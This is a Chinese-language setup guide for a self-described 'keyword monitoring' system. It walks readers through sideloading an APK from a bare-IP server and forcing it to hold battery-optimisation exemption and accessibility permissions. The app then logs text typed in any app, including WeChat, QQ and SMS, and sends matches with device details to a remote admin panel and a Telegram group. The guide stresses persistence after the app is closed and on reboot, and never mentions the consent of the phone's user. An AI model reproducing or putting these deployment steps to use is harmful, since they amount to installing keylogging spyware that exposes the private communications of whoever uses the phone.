🎉 关键词监控系统 - 立即使用指南
========================================

✅ 后台已启动成功！现在可以开始使用了！

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

📊 第一步：打开管理后台
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

浏览器访问：http://38.49.29.167:3000

您会看到三个功能面板：
✅ 已连接设备 - 查看所有已连接的手机
✅ 关键词管理 - 添加/删除监控关键词  
✅ 警告通知 - 查看触发记录

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

📱 第二步：下载并安装最新版APP
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

🔥 最新版本：v3.0 强制引导版（重要！）

下载地址：
方法1（推荐）: http://38.49.29.167:3000/index-download.html
方法2（直接）: http://38.49.29.167:3000/关键词监控-强制引导版.apk

⭐ 新版特性：
• 首次安装会强制引导开启所有必要权限
• 完成所有设置才能使用
• 确保退出APP后也能持续监控

安装步骤：
1. 手机浏览器打开上面的下载地址
2. 下载APK文件
3. 允许"安装未知来源应用"
4. 安装APK

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

🚀 第三步：首次打开APP（强制引导）
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

⚠️ 重要：首次打开会自动引导，所有步骤都必须完成！

引导流程：

【步骤1】欢迎界面
   → 介绍需要设置的权限
   → 点击"开始设置"

【步骤2】配置服务器地址 ⭐
   → 输入：http://38.49.29.167:3000
   → 点击"下一步"

【步骤3】允许后台运行 ⭐⭐⭐ 最关键！
   → 点击"去设置"
   → 跳转到电池优化设置
   → 选择"不受限制"或"无限制"或"允许"
   → 返回APP
   
   ⚠️ 如果没设置好：
   → 会弹出"请完成设置"提示
   → 必须重新去设置
   → 这是确保退出APP也能监控的核心设置！

【步骤4】启用辅助功能 ⭐⭐⭐ 必须开启！
   → 点击"去设置"
   → 跳转到辅助功能设置
   → 找到"关键词监控"
   → 打开开关
   → 允许所有权限弹窗
   → 返回APP（会自动检测是否已开启）

【步骤5】设置完成 ✅
   → 显示"设置完成！"
   → 点击"进入应用"
   → 完成！

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

🎮 第四步：在管理后台添加关键词
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

1. 浏览器打开：http://38.49.29.167:3000

2. 在"关键词管理"面板：
   ✅ 输入要监控的关键词（例如：测试）
   ✅ 选择匹配类型：
      • 完全匹配 - 必须完全相同才触发
      • 模糊匹配 - 文段中包含就触发（推荐）
   ✅ 点击"添加"

3. 建议先添加几个测试关键词：
   • 测试（模糊匹配）
   • 你好（模糊匹配）

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

🧪 第五步：测试是否正常工作
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

测试方法：

1. 在手机上打开任意输入应用：
   • 微信
   • 记事本
   • 短信
   • QQ
   • 任何能打字的APP

2. 输入你设置的关键词：
   例如输入："今天天气真好，我要测试一下"

3. 立即刷新管理后台页面

4. 查看"警告通知"面板：
   ✅ 应该显示触发记录
   ✅ 包含设备名称
   ✅ 触发的关键词
   ✅ 相关文本
   ✅ 设备本地时间

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

🔥 第六步：验证退出APP后是否持续工作
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

⭐ 这是最关键的测试！

方法1：完全退出APP
1. 按Home键回到主屏幕
2. 打开多任务（最近任务）
3. 向上滑动清理"关键词监控"APP
4. 等待5秒
5. 检查通知栏 → 应该仍然显示"关键词监控运行中"
6. 打开微信输入关键词
7. 刷新管理后台 → 应该仍然能收到警告！

方法2：重启手机
1. 完全重启手机
2. 重启后不要打开APP
3. 检查通知栏 → 应该自动显示"关键词监控运行中"
4. 输入关键词测试
5. 刷新管理后台 → 应该能收到警告！（开机自启）

✅ 成功标志：
• 通知栏常驻"关键词监控运行中"
• 即使完全退出APP也能收到警告
• 重启后自动启动

❌ 如果失败：
→ 说明步骤3（电池优化）没设置好
→ 需要重新设置：
   设置 → 应用 → 关键词监控 → 电池 → 不受限制

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

💬 第七步：配置Telegram通知（可选但推荐）
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

如果你想接收即时通知到Telegram群组：

1. 在管理后台找到"Telegram机器人配置"面板

2. 准备Telegram Bot：
   • 打开Telegram，搜索 @BotFather
   • 发送 /newbot
   • 按提示创建机器人
   • 获取Bot Token（例如：123456789:ABCdefGHIjklMNOpqrsTUVwxyz）

3. 获取Chat ID：
   • 创建一个Telegram群组
   • 把机器人加入群组
   • 发送一条消息到群组
   • 浏览器访问：
     https://api.telegram.org/bot<你的Token>/getUpdates
   • 找到"chat":{"id":-1001234567890}
   • 这个就是Chat ID

4. 在管理后台填入：
   • Bot Token
   • Chat ID
   • 点击"保存配置"
   • 点击"测试发送"验证

5. 配置成功后：
   → 每次触发关键词
   → Telegram群内自动收到通知
   → 包含设备信息、关键词、时间等

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

📋 完整功能清单
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

✅ 已实现的功能：

【监控功能】
✓ 实时监控手机输入
✓ 支持所有输入法
✓ 支持所有APP（微信、QQ、短信等）
✓ 完全匹配模式
✓ 模糊匹配模式
✓ 后台持续运行（退出APP也工作）
✓ 开机自动启动

【管理后台】
✓ 设备管理（查看所有连接的设备）
✓ 关键词管理（添加/删除/选择匹配类型）
✓ 警告通知（实时查看触发记录）
✓ 显示设备本地时间
✓ 显示触发的文本内容
✓ Telegram机器人通知

【权限管理】
✓ 首次安装强制引导
✓ 自动请求电池优化豁免
✓ 引导开启辅助功能
✓ 前台服务通知
✓ 开机自启权限

【跨网络支持】
✓ 支持WiFi连接
✓ 支持4G/5G网络
✓ 公网IP访问
✓ 不限制同一局域网

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

❓ 常见问题
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Q1: 为什么管理后台打不开？
A: 后端服务未启动，运行命令：
   cd /www/wwwroot/keyword-monitor && ./start.sh

Q2: 为什么退出APP后不工作了？
A: 电池优化没设置好，必须选择"不受限制"

Q3: 为什么手机上看不到通知栏？
A: 辅助功能未开启，去设置中打开

Q4: 如何重新配置权限？
A: 卸载APP重新安装，会重新引导

Q5: 支持哪些手机品牌？
A: 所有Android手机都支持，但国产手机需要额外设置

Q6: 手机能在外地用吗？
A: 可以！只要能上网就行，支持WiFi/4G/5G

Q7: 如何查看服务是否在运行？
A: 通知栏显示"关键词监控运行中"就是在运行

Q8: Telegram必须配置吗？
A: 不是必须的，但配置后更方便接收通知

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

🎯 快速检查清单
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

安装完成后，确保以下都是 ✅：

□ 管理后台能打开（http://38.49.29.167:3000）
□ APP已安装到手机
□ 完成了强制引导流程（4个步骤）
□ 服务器地址已配置（http://38.49.29.167:3000）
□ 电池优化设置为"不受限制" ⭐
□ 辅助功能已开启 ⭐
□ 通知栏显示"关键词监控运行中"
□ 管理后台添加了关键词
□ 输入测试关键词能触发警告
□ 退出APP后仍然能触发警告 ⭐
□ （可选）Telegram配置成功

全部 ✅ = 完美！可以正常使用了！

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

🎉 开始使用吧！
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

现在一切就绪：

1. 管理后台：http://38.49.29.167:3000
2. 下载APP：http://38.49.29.167:3000/index-download.html
3. 按引导完成设置
4. 添加关键词
5. 开始监控！

📞 使用过程中有任何问题，随时联系！








